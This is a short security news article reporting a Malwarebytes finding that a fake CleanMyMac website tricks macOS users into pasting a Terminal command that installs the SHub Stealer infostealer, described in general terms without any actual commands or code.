Cybercriminals have started targeting macOS users with more advanced tools, and a new malware campaign shows how attackers now rely on deception rather than software vulnerabilities to steal sensitive data. The attack spreads through a fake utility website that tricks users into installing a malicious program designed to steal passwords, files, and cryptocurrency wallet information from Mac computers.
The operation works by impersonating CleanMyMac, a popular Mac optimization tool developed by MacPaw. Attackers built a convincing clone of the official website and hosted it on a similar domain, which makes it easy for users to mistake it for the real product and follow the installation instructions without suspecting anything unusual.
Security researchers at Malwarebytes uncovered the campaign and warned that attackers rely on social engineering rather than technical exploits. As the researchers explained, “Instead of exploiting a vulnerability, it tricks the user into running the malware themselves.”
Fake installer hides an infostealer
Visitors to the fake site receive instructions to open Terminal and paste a command instead of downloading a normal installer. That command secretly downloads SHub Stealer, a macOS infostealer designed to collect browser passwords, Apple Keychain data, cookies, cryptocurrency wallets, and messaging session files.
Once installed, the malware asks for the system password using a fake macOS prompt. The password unlocks access to sensitive data stored on the device, allowing the malware to extract credentials, tokens, and wallet information.
The malware also installs a hidden background process disguised as a Google update service. This persistent component allows attackers to run commands on the infected Mac and maintain access until the malicious files are removed.
Security researchers warn that macOS is becoming a larger target for cybercriminal groups as attack tools grow more organized and professional.
